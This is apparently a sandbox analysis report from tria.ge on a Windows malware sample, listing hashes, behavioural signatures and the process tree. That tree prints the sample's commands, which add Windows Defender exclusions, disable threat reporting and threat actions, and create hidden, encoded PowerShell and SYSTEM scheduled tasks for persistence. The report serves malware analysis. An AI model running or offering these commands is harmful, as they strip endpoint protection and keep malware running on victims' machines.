Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    124s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220901-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
  • submitted
    29/10/2022, 06:58

General

  • Target

    file.exe

  • Size

    7.3MB

  • MD5

    1747dafa2b2b2b16244925f00d37eaeb

  • SHA1

    1db1a2b0293a16beb65b65d02401842f82aca174

  • SHA256

    e23ad43ad1730cb25b11f18add7b738c59ecbbe9ce1006e7847d5b965fb9ef72

  • SHA512

    1e01b49098108e779fd7e499c54837c95b6d40f53a01a5157700a6a1658afc7144867704a001cb5dc878b4e1b1359731c5e67f6551b69d014811399ca4d86d43

  • SSDEEP

    196608:91OdN9lsVpHxcSdgggP2/SOcb8D07AvXhkvUbfv+UVJmQrI:3OVlspHX9/SOU8w7Avxkev+oMQrI

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 4 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 2 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Drops file in System32 directory 31 IoCs
  • Drops file in Program Files directory 14 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 11 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 40 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4100
    • C:\Users\Admin\AppData\Local\Temp\7zSBF6D.tmp\Install.exe
      .\Install.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:4980
      • C:\Users\Admin\AppData\Local\Temp\7zSC345.tmp\Install.exe
        .\Install.exe /S /site_id "525403"
        3⤵
        • Executes dropped EXE
        • Checks BIOS information in registry
        • Checks computer location settings
        • Drops file in System32 directory
        • Enumerates system info in registry
        • Suspicious use of WriteProcessMemory
        PID:2336
        • C:\Windows\SysWOW64\forfiles.exe
          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:396
          • C:\Windows\SysWOW64\cmd.exe
            /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1868
            • \??\c:\windows\SysWOW64\reg.exe
              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
              6⤵
                PID:3736
              • \??\c:\windows\SysWOW64\reg.exe
                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                6⤵
                  PID:952
            • C:\Windows\SysWOW64\forfiles.exe
              "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:2484
              • C:\Windows\SysWOW64\cmd.exe
                /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:2144
                • \??\c:\windows\SysWOW64\reg.exe
                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                  6⤵
                    PID:3680
                  • \??\c:\windows\SysWOW64\reg.exe
                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                    6⤵
                      PID:4512
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /CREATE /TN "gRNfnhKhF" /SC once /ST 04:47:54 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                  4⤵
                  • Creates scheduled task(s)
                  PID:4632
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /run /I /tn "gRNfnhKhF"
                  4⤵
                    PID:228
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /DELETE /F /TN "gRNfnhKhF"
                    4⤵
                      PID:3164
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /CREATE /TN "bVdqBxoxNAgpdKrXAY" /SC once /ST 07:00:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\WGlEvBqMGupapHPaj\LFqhtLxKdKUjncZ\KxUoLgv.exe\" Pu /site_id 525403 /S" /V1 /F
                      4⤵
                      • Drops file in Windows directory
                      • Creates scheduled task(s)
                      PID:2996
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                1⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:1132
                • C:\Windows\system32\gpupdate.exe
                  "C:\Windows\system32\gpupdate.exe" /force
                  2⤵
                    PID:3836
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                  1⤵
                    PID:2288
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                    1⤵
                      PID:4364
                    • C:\Windows\system32\gpscript.exe
                      gpscript.exe /RefreshSystemParam
                      1⤵
                        PID:4264
                      • C:\Users\Admin\AppData\Local\Temp\WGlEvBqMGupapHPaj\LFqhtLxKdKUjncZ\KxUoLgv.exe
                        C:\Users\Admin\AppData\Local\Temp\WGlEvBqMGupapHPaj\LFqhtLxKdKUjncZ\KxUoLgv.exe Pu /site_id 525403 /S
                        1⤵
                        • Executes dropped EXE
                        • Drops file in System32 directory
                        • Suspicious use of WriteProcessMemory
                        PID:3148
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"
                          2⤵
                          • Drops file in System32 directory
                          • Modifies data under HKEY_USERS
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:3500
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                            3⤵
                            • Suspicious use of WriteProcessMemory
                            PID:4464
                            • C:\Windows\SysWOW64\reg.exe
                              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                              4⤵
                                PID:3976
                            • C:\Windows\SysWOW64\reg.exe
                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                              3⤵
                                PID:3084
                              • C:\Windows\SysWOW64\reg.exe
                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                3⤵
                                  PID:5048
                                • C:\Windows\SysWOW64\reg.exe
                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                  3⤵
                                    PID:4988
                                  • C:\Windows\SysWOW64\reg.exe
                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                    3⤵
                                      PID:2424
                                    • C:\Windows\SysWOW64\reg.exe
                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                      3⤵
                                        PID:1956
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                        3⤵
                                          PID:2136
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                          3⤵
                                            PID:708
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                            3⤵
                                              PID:3092
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                              3⤵
                                                PID:1868
                                              • C:\Windows\SysWOW64\reg.exe
                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                3⤵
                                                  PID:4328
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                  3⤵
                                                    PID:1196
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                    3⤵
                                                      PID:3700
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                      3⤵
                                                        PID:1996
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                        3⤵
                                                          PID:3352
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                          3⤵
                                                            PID:2636
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                            3⤵
                                                              PID:3200
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                              3⤵
                                                                PID:2708
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                3⤵
                                                                  PID:2652
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                  3⤵
                                                                    PID:4604
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                                    3⤵
                                                                      PID:308
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                                      3⤵
                                                                        PID:672
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                                        3⤵
                                                                          PID:3912
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                                          3⤵
                                                                            PID:3676
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DTVeiSnVEyUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DTVeiSnVEyUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XSxxgBHfieTOC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XSxxgBHfieTOC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fpJTwAuoAMgU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fpJTwAuoAMgU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fwdFzFoCzBKlRQNBqUR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fwdFzFoCzBKlRQNBqUR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qwQKalOeU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qwQKalOeU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\qKCUkteWWCrbVFVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\qKCUkteWWCrbVFVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\WGlEvBqMGupapHPaj\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\WGlEvBqMGupapHPaj\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\vhTqjLQymokpPpPb\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\vhTqjLQymokpPpPb\" /t REG_DWORD /d 0 /reg:64;"
                                                                          2⤵
                                                                          • Drops file in System32 directory
                                                                          • Modifies data under HKEY_USERS
                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:4860
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DTVeiSnVEyUn" /t REG_DWORD /d 0 /reg:32
                                                                            3⤵
                                                                              PID:1140
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DTVeiSnVEyUn" /t REG_DWORD /d 0 /reg:32
                                                                                4⤵
                                                                                  PID:4224
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DTVeiSnVEyUn" /t REG_DWORD /d 0 /reg:64
                                                                                3⤵
                                                                                  PID:2400
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XSxxgBHfieTOC" /t REG_DWORD /d 0 /reg:32
                                                                                  3⤵
                                                                                    PID:3232
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XSxxgBHfieTOC" /t REG_DWORD /d 0 /reg:64
                                                                                    3⤵
                                                                                      PID:1160
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fpJTwAuoAMgU2" /t REG_DWORD /d 0 /reg:32
                                                                                      3⤵
                                                                                        PID:1308
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fpJTwAuoAMgU2" /t REG_DWORD /d 0 /reg:64
                                                                                        3⤵
                                                                                          PID:796
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fwdFzFoCzBKlRQNBqUR" /t REG_DWORD /d 0 /reg:32
                                                                                          3⤵
                                                                                            PID:3460
                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fwdFzFoCzBKlRQNBqUR" /t REG_DWORD /d 0 /reg:64
                                                                                            3⤵
                                                                                              PID:1120
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qwQKalOeU" /t REG_DWORD /d 0 /reg:32
                                                                                              3⤵
                                                                                                PID:4768
                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qwQKalOeU" /t REG_DWORD /d 0 /reg:64
                                                                                                3⤵
                                                                                                  PID:4176
                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\qKCUkteWWCrbVFVB /t REG_DWORD /d 0 /reg:32
                                                                                                  3⤵
                                                                                                    PID:2036
                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\qKCUkteWWCrbVFVB /t REG_DWORD /d 0 /reg:64
                                                                                                    3⤵
                                                                                                      PID:3328
                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\WGlEvBqMGupapHPaj /t REG_DWORD /d 0 /reg:32
                                                                                                      3⤵
                                                                                                        PID:4888
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\WGlEvBqMGupapHPaj /t REG_DWORD /d 0 /reg:64
                                                                                                        3⤵
                                                                                                          PID:1612
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\vhTqjLQymokpPpPb /t REG_DWORD /d 0 /reg:32
                                                                                                          3⤵
                                                                                                            PID:732
                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\vhTqjLQymokpPpPb /t REG_DWORD /d 0 /reg:64
                                                                                                            3⤵
                                                                                                              PID:1040
                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                            schtasks /CREATE /TN "gElsJESGL" /SC once /ST 02:21:35 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                            2⤵
                                                                                                            • Creates scheduled task(s)
                                                                                                            PID:4516
